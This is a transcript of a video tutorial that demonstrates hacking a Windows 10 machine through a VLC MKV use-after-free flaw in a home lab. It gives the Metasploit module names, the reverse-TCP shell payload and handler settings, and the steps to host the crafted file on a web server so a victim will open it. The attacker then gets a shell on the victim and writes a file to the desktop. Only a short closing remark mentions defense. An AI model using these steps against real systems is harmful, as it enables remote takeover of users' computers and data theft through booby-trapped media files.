[00:00:00,030] Hi and welcome back to another episode on how to hack. So today we're going to discuss using executables against a practical application; in this case, to be specific, it's on VLC. So there are many Common Vulnerabilities and Exposures that allow us to actually take advantage of those executables launching into an application, for example on an operating system. And for today's tutorial we are going to target Windows 10, and once you have the user clicking on the file, executing it on VLC, then you have the operating system on Windows 10 immediately begin a shell to Kali Linux, and you can do a lot more things from there: you are able to launch different kinds of attacks, you are able to look for sensitive data, download that information, upload it into an existing server as well, and many other different things once you have access into its shell. So without further ado let us kick-start on today's tutorial.

[00:00:59,789] So on the right of the screen I have Kali Linux running and on the left of the screen I have a Windows 10 64-bit running. So like I mentioned earlier, today's tutorial is to target a Windows 10 machine which has a VLC media player. So we're going to go ahead and launch a terminal on Kali Linux. So over here we can zoom in a little, make the font size a little bigger so you can see it clearly, and we can go in and enter ifconfig so that we know the IP address of the attacking machine. So in this case we have the attacking machine running on the IP address of 192.168.1.10. So we can go ahead and launch msfconsole so that we can find out where the exploit is and how we can exploit it fully into the target machine. So once you're launching msfconsole, while we're doing that and we're starting up the Metasploit Framework console, let's open up Internet Explorer. So on the Internet Explorer we're going to download a file later on. So here you can search for VLC so we can look at all the vulnerabilities that are associated with the VLC software. So in this case we are going to use number three, which is exploit/windows/fileformat/vlc_mkv, so it's an MKV use-after-free. And what we can do right now is that we have identified the exploit we will be using, so we can go ahead and enter use exploit/windows/fileformat/vlc_mkv, so this is exactly the naming that we have over here in order to utilize the exploit. So we can enter show options to see what are the parameters that we have to access into. So we can set the LHOST, which is the attacking machine, as 192.168.1.10. So once you've done that you can again do a double check to see whether you got the LHOST right, whether you got the LPORT right, so do take note of these two items. And one more thing I wanted to really pay attention to is the payload option, so in this case you'll be using a windows/x64/shell/reverse_tcp, so that will give us a reverse connection back into the Windows machine, so essentially allowing us to bypass any standard Windows firewall in the environment.

[00:03:19,989] So moving forward, what we can do is we can actually go ahead and exploit to generate the file. So once you hit exploit it would actually generate the file over here. So what we can see is we have the files stored on /root/.msf4/local, followed by part 1 and part 2. So we're going to go ahead and open another terminal and then likewise we are going to go directly into the folder, so we go to /root/.msf4 and then we can do ls, we can go to local again and then we do ls and we can see all the files that we have generated. So in my case I've generated a number of files; again it could be KB and of course we're going to showcase on uwt as well. And we can do ls -l; you realize that the part 1 file is significantly larger than the part 2 file, and if we see over here we actually have more than a gigabyte of file size, so it's gotta take a while for you, or for the victim machine, to download those files. So it's really important that you could use some kind of compression technology so you could copy those files into a web server and host it over there. So what I've done is I've actually copied the very initial file that I generated earlier, so once we go into /var/www/html we can do ls -l, so here we can see we have two files that are available that we have generated earlier. And once you have that you can actually check your Apache server status, so here we can see that we have the server, it's disabled, and of course we want to check some configurations before we actually initiate the Apache server. So what you can do is you can actually do a cat /etc/apache2/ports.conf, so here we see that we have the web server listening on 8001. So once we have the necessary information we can go ahead and start the service, so service apache2 start, so this will start up the Apache web server, and once you have it running you want to do a double check to make sure that you have the web service running. So here we see that the server is running and we are hosting those files.

[00:05:29,010] So what we can do is we can go back into the Metasploit and look at different ways for us to start the listener. So what you can do is go ahead and enter exploit/multi/handler, so this would start the multi handler, and then we have the set payload. So remember the payload that we were discussing about, that we have to take note of: it's windows/x64/shell/reverse_tcp. So once we have set that we've got to look at the options, so we type show options. So in this case we have to fill in the LHOST, and we already have the LPORT specified, which is the exact same as the payload that we made earlier. So go ahead and enter the LHOST of 192.168.1.10, so this is the attacking machine, which is the IP address of the Kali Linux. So now with this in mind we can go ahead and enter exploit so that we have our listener. So we have the reverse TCP handler running right now on port 4444.

[00:06:30,930] So we can go ahead and go into the Windows 10 operating system and you can go to 192.168.1.10 followed by the port of 8001. So over here you can go to the uwt part 1 and the part 2; you can compress them into a single file, and then from there on, once it is uncompressed, the user can access it and immediately will see all those details. So moving forward we can actually go into the downloads page, we can open up the folder. So I already have the file downloaded; it will take a while for the file to download completely into the target machine, and once you have the file the user will open it with the VLC media player. So once you click that, no, I'm not going to send a report, so we can open up the file. We see we have the uwt part 1 MKV running, so in this case if you see on the right side we actually have the bytes sent over, sending the stage, command shell opened, and over here we have a shell directly into the system. So if you enter, for example, a simple command like dir, we would see all of the files available within the system. So we can see the dot, dot-dot, cd dot-dot, and then we can go into, of course, the desktop, which is an area that we are really interested in. So if I do a dir we can see there; then cd into Users; do a dir again; we can cd into the user, which is the current user, on the desktop right now. So if I was to minimize everything, so here we have the desktop running, and then we can do a dir, and then this time around we're going to access into the desktop and then we're going to go further into our attack attempt. So over here we're really gaining access into the environment, and what we can do is we can actually very quickly do echo "you have been hacked" and then followed by this, and then we will pump it out into a file called hacked.txt. So once you do that, on the left side screen you can see that we have a hacked.txt available, already created because of the command coming from the right side. So if you enter hacked.txt this would open up the file and then we realize that the system has been completely compromised, and from here we recognize that we have already been hacked.

[00:08:50,410] So there you're seeing how quickly we could actually gain access into the system once the user downloads the file and executes the file; we'll be able to gain direct access into the system through a vulnerability within the application, and in this case the tutorial was on Windows 10 running on a VLC application. So likewise, as you have seen from many other different tutorials, it could be from Mac or Excel that I mentioned earlier, or from PDF files, the attack vectors are plenty and there are many different ways for you to hijack the system, including phishing email. So there are really many, many ways of gaining access into the enterprise. So the next question I have for you, for you to think back after today's tutorial, is what can you do as an enterprise to defend against those different kinds of cyber threats? If it's a phishing email, if it's a compromise directly into your service, if it's a compromise on your end-user machines, which may have critical data residing there as well; so with so many different kinds of attack vectors, how do you build a layered defense against many of these different potential areas of potential risk that could come into your critical data? So that is something for you to think about, and I hope you learned something valuable today in today's tutorial, and if you like what you've just watched feel free to subscribe and leave a comment below so that I can do whatever I can to respond to any of your questions, and thank you so much for watching again.